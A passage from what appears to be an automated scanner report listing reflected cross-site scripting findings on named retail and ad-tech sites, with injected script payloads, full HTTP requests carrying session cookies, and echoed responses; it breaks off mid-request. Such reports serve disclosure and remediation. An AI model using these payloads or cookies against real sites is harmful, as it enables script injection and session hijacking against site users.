5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f479"><script>alert(1)</script>f3b7e714c62 was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479"><script>alert(1)</script>f3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4DF5DD64853B60409638EF60D0B5CE6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4ADDCC8A6DA08BE89115D16EDFB6D509; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:14:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 498

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>alert(1)</script>f3b7e714c62&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979965478%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758520%22%7D
...[SNIP]...

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Issue detail

The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62b4f%3balert(1)//1857386a781 was submitted in the jsonpcallback parameter. This input was echoed as 62b4f;alert(1)//1857386a781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp130551084625262b4f%3balert(1)//1857386a781 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 9d0cadfc-2324-42cd-a008-a68d2528482e
Content-Language: en-us
Hni-Response-Time-Ms: 0
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3753

jsonp130551084625262b4f;alert(1)//1857386a781("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=
...[SNIP]...

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the clickid request parameter is copied into an HTML comment. The payload 63471--><script>alert(1)</script>f5bbaf27fb7 was submitted in the clickid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:35 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 -->
...[SNIP]...

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69603--><script>alert(1)</script>0d9d386e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 -->
...[SNIP]...

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba652--><script>alert(1)</script>9557872ffa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?ba652--><script>alert(1)</script>9557872ffa1=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:32 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: ba652--><script>alert(1)</script>9557872ffa1=1 -->
...[SNIP]...

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25276--><script>alert(1)</script>ccb31578d5a was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?rdir=1A25276--><script>alert(1)</script>ccb31578d5a HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: rdir=1A25276--><script>alert(1)</script>ccb31578d5a -->
...[SNIP]...

5.53. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2542d"><a>b6abcdf389d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/164792542d"><a>b6abcdf389d/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:36:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS29f0cc=b0d1ad0ba7546d6b2b5b7e9034b704ed871d7ea6dc67d58e4dd0fe2f60ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href="http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/15/ci/164792542d"><a>b6abcdf389d/N/4267396714">
...[SNIP]...

5.54. http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/buy/Camcorders-Housings/ci/16479/N/4267396714

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb38f'><a>2ecfd8f2719 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c/buy/Camcorders-Housings/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541019847&t2=1305541026297&t3=1305541028965&t4=1305541013259&lti=1305541028965&ln=&hr=/c/buy/Camcorders-Housings/ci/16479/N/4267396714&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:40 GMT
Connection: close
Set-Cookie: TS29f0cc=ae3fe2cae9d870f2a3b02425c0e4c166871d7ea6dc67d58e4dd0fe3760ac0ec569178bf8b092ce85bc587bdd; Path=/
Content-Length: 197632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-
...[SNIP]...
<a href='http://www.bhphotovideo.com/c/buy/Camcorders-Housings/pn/2/ci/16479fb38f'><a>2ecfd8f2719/N/4267396714'>
...[SNIP]...

5.55. http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75463"style%3d"x%3aexpression(alert(1))"25b680a7acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75463"style="x:expression(alert(1))"25b680a7acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more&75463"style%3d"x%3aexpression(alert(1))"25b680a7acd=1 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:37:54 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:37:43 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:37:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220459

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...
<meta http-equiv="refresh" content="0;url=/build-your-own-diamond-ring?75463"style="x:expression(alert(1))"25b680a7acd=1&track=more&first_step=diamond&forceStep=DIAMONDS_STEP&mode=BASIC&reason=noscript" />
...[SNIP]...

5.56. http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login.cfm

Issue detail

The value of the bv_AA_enabled request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 529c3"style%3d"x%3aexpression(alert(1))"362edd0e270 was submitted in the bv_AA_enabled parameter. This input was echoed as 529c3"style="x:expression(alert(1))"362edd0e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/login.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=529c3"style%3d"x%3aexpression(alert(1))"362edd0e270&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; 